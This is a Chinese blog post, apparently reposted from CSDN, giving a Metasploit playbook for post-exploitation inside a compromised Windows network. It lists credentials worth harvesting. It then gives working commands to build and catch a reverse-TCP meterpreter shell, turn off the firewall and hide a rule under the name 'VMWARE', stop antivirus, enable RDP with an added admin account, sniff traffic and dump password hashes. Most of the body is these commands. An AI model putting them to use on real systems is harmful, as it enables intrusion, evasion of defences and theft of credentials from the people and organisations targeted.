码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 内网信息收集


    目录

    内网信息收集简介

    01内网信息收集

    02信息收集思路

    Metasploit内网信息收集

    01msf反弹shell

    02msf反弹shell

    03通过shell关闭防火墙

    04关闭杀毒软件

    05打开并连接3389

    06数据包抓取

    07口令破解


    内网信息收集简介

    01内网信息收集

    内网渗透:在拿到websehll的时候,想办法获得系统信息拿到系统权限,进入到网络系统内部之后收集内部网络的各种信息,获取内部网络有价值的人员、资产信息。

    02信息收集思路

    内网信息收集常见的思路:

    1.系统管理员密码

    2.其他用户的session、3389和ipc连接记录、用户回收站信息收集

    3.浏览器密码和cookies的获取,ie,chrome,firefox等

    4.windows无线密码获取、数据库密码获取

    5.host文件获取、dns缓存信息收集

    6.进程、补丁、网络代理、软件列表等信息

    7.VPN历史密码、teamview密码、启动项、iislog等

    8.常见后渗透信息收集工具

    Metasploit内网信息收集

    01msf反弹shell

    首先生成一个payload

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=3333 -f exe > shell.exe

    将payload发送到目标机器让其执行

    02msf反弹shell

    配置反弹会话处理程序

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost 192.168.20.128

    set lport 4444

    exploit

    03通过shell关闭防火墙

    shell(execute -f cmd -i -H)

    netsh advfirewall set allprofiles state off

    netsh advfirewall show allprofiles

    通过策略添加防火墙规则隐蔽行为

    netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow

    netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL

    重启生效:

    shurdown -r -f -t 0

    04关闭杀毒软件

    关闭windefenf

    net stop windefenf

    关闭杀毒软件

    run killav

    run post/windows/manage/killav

    05打开并连接3389

    开启3389远程桌面

    run post/windows/manage/enable_rdp

    run getgui -e

    可以利用该命令在目标机器上添加用户:

    run getgui -u admin -p admin

    net localgroup administrators admin /add

    远程连接桌面

    rdesktop -u username -p password ip

    查看远程桌面

    screenshot

    use espia

    screengrab

    screenshare

    删除指定账号

    run post/windows/manage/delete_user USERNAME=admin

    06数据包抓取

    抓包

    Load sniffer

    Sniffer_interfaces

    Sniffer_start 2

    Sniffer_dump 2 1.cap

    解码

    Use auxiliary/sniffer/psnuffle

    Set PCAPFILE 1.cap

    exploit

    07口令破解

    use post/windows/gather/hashdump //system权限的meterpreter

    set session 1

    exploit //结果保存在tmp目录下

    use post/windows/gather/smart_hashdump

    set session 1

    exploit

    格式

    用户名称:RID:LM-HASH值:NT-HASH值

    rid是windows系统账户对应固定的值,类似于linux的uid,gid号,500为administartor,501为guest等。而lm-hash和nt-hash,他们都是对用户密码进行的加密,只不过加密方式不同

  • 相关阅读:
    babel.config.js配置文件详解
    卡尔曼滤波器(目标跟踪一)(上)
    【uniapp】本地资源图片无法通过 WXSS 获取,可以使用网络图片,或者 base64,或者使用image标签
    算法训练营day45|动态规划 part07:完全背包 (LeetCode 70. 爬楼梯(进阶)、322. 零钱兑换、279.完全平方数)
    flink sql实战案例
    L67.linux命令每日一练 -- 第十章 Linux网络管理命令 -- netstat和ss
    C++ 【类和对象: 析构函数,拷贝构造函数,运算符重载 --2】
    基于域名的方式访问Istio服务网格中的多个应用程序
    卷积神经网络 - 从全连接层到卷积
    起重机笔记 - 进阶篇(编辑中...)
  • 原文地址:https://blog.csdn.net/m0_63127854/article/details/125473706
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号